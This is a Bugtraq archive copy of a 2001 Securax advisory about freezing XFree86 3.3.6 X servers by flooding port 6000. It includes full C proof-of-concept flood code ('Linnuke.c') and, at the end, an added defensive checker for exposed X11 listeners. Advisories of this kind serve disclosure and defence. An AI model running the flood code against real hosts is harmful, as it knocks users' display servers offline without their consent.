Bugtraq mailing list archives

Securax Advisory 11


From: incubus <incubus () SECURAX ORG>
Date: Mon, 1 Jan 2001 15:50:37 +0100

=============================================================================
Securax-SA-11                                               Security Advisory
belgian.networking.security                                             Dutch
=============================================================================
Topic:          X-windows can be caused to freeze.
Announced:      2000-12-26
Affects:        XFree86 Version 3.3.6 / X Window System [on SuSE 6.4]
                Other versions not tested.
=============================================================================



Note: This entire advisory has been based upon trial and error results. We
      cannot ensure the information below is 100% correct being that we have
      no source code to audit. This document is subject to change without
      prior notice.

      If you happen to find more information or problems concerning the below
      problem or further variants please contact me on the following email
      root () htw zzn com (or ilja () securax org), or you can contact the
      securax info () securax org.

I.  Problem Description
-----------------------

When a large amount of characters are sent to the X-windows daemon (port
6000), X-windows will become laggy for a few seconds, so if one would send a
lot of characters to it, in a continuous loop, the server will freeze! The
only thing that works as far as I know to get X back to work is a reboot.

II. Impact
----------

X-windows servers can be caused to be laggy and even to freeze. The code in
this advisory is proof of concept code for this DoS.

/* --| BOF |-- */

/* Linnuke.c (DoS)
 *
 * written by R00T-dude
 *
 * first of all, why the lame name
 * remember in the "good old days" the winnuke.c
 * well this gives about the same effect on linux
 * and probably any other form of unix that has
 * X-windows port (6000) open.
 *
 * I found this when I was playing around with
 * this stresstool I was coding, I noticed my
 * X-win became pretty laggy when I sended 9000 A's
 * to port 6000, so I started coding on some
 * easy poc code for X-win and well, euh, ...
 * X-win FROZE !!!, so far all you can do to
 * get X to work again is reboot.
 *
 * In no way, form or shape can I nor the securax crew
 * be held responsible for any use and/or misuse of this
 * code.
 *
 * greetz to: |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,
 * t-omicron, [tosh], demongirl, zym0t1c,segfau|t, so many others I forgot
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>

main(int argc, char **argv)
{
 int sock, conn, i, b;
 char buff[10000];
 struct sockaddr_in sin;
 struct hostent *hp;

 for(i=0; i<9000; i++)
 {
 strcat(buff, "\x41");  /* SHELLCODE ?? :) */
 }
 strcat(buff, "\n");

 if( (hp=gethostbyname(argv[1])) == NULL)
 {
  fprintf(stderr, "Gethostbyname() !"); exit(0);
 }

 for(b=0; b < b +1; b++)
 {
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0)
  {
   fprintf(stderr, "Socket() !\n");  exit(sock);
  }
  sin.sin_family = AF_INET;
  sin.sin_port = 6000;
  sin.sin_addr.s_addr = inet_addr(argv[1]);

  conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
 if (conn < 0)
  {
   printf("Connect() !\n");
   /* don't exit(); or the loop will stop */
  }

  send(sock, buff, sizeof(buff), 0);
  close(sock);
 }
}

/* --| EOF |-- */

III. possible workarounds
-------------------------

possible workarounds ::
   - don't use X, who needs it anyway
   - close the X-win port
   - filter the X-win port with a decent firewall
     (however, you can still be Dossed (local))
   - use windows (euh, nevermind)

IV. credits
-----------

thx go out to : Incubus for testing
greetz go out to : |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0, t-omicron,
                   [tosh], demongirl, zym0t1c, segfau|t, so many others I
                   forgot

-R00T-dude(root () htw zzn com or ilja () securax org).
=============================================================================
For more information      ilja () securax org
Website                   http://www.securax.org
Advisories/Text           http://www.securax.org/pers
-----------------------------------------------------------------------------
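
To check the "close the X-win port" workaround on a Linux host, the following added example (not part of the advisory or of Securax's code) scans rows in `/proc/net/tcp` format for X11 listeners bound to a non-loopback address. It assumes a little-endian host and the commonly cited 6000-6063 display port range; the sample rows are constructed.

```c
#include <stdio.h>
#include <string.h>

/* X display :N listens on TCP 6000+N; 6000-6063 is an assumed range. */
#define X11_BASE   6000
#define X11_LAST   6063
#define TCP_LISTEN 0x0A

/* Returns 1 if one /proc/net/tcp row is a listening X11 socket reachable
 * from the network (bound to anything but 127.0.0.0/8), else 0.
 * Assumes a little-endian host, where the first octet is the low byte. */
int x11_exposed(const char *row)
{
    unsigned int addr, port, state;
    if (sscanf(row, " %*d: %8X:%4X %*8X:%*4X %2X", &addr, &port, &state) != 3)
        return 0;                       /* header or malformed row */
    if (state != TCP_LISTEN || port < X11_BASE || port > X11_LAST)
        return 0;
    return (addr & 0xFF) != 0x7F;       /* 0x7F = 127.x.x.x loopback */
}

/* Counts exposed X11 listeners in a whole table (newline separated rows). */
int count_exposed(const char *table)
{
    int n = 0;
    while (table && *table) {
        n += x11_exposed(table);
        table = strchr(table, '\n');
        if (table) table++;
    }
    return n;
}

/* Constructed sample rows, not captured from a real host. */
static const char SAMPLE[] =
    "  sl  local_address rem_address   st\n"
    "   0: 00000000:1770 00000000:0000 0A\n"   /* 0.0.0.0:6000 LISTEN     */
    "   1: 0100007F:1771 00000000:0000 0A\n"   /* 127.0.0.1:6001 LISTEN   */
    "   2: 0A00000A:1770 0B00000A:C350 01\n"   /* established, not LISTEN */
    "   3: 00000000:0016 00000000:0000 0A\n";  /* port 22, not X11        */

int main(void)
{
    printf("exposed X11 listeners: %d\n", count_exposed(SAMPLE));
    return 0;
}
```

A non-zero count means the X server still accepts TCP connections from other hosts, so the port is neither closed nor bound to loopback only.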

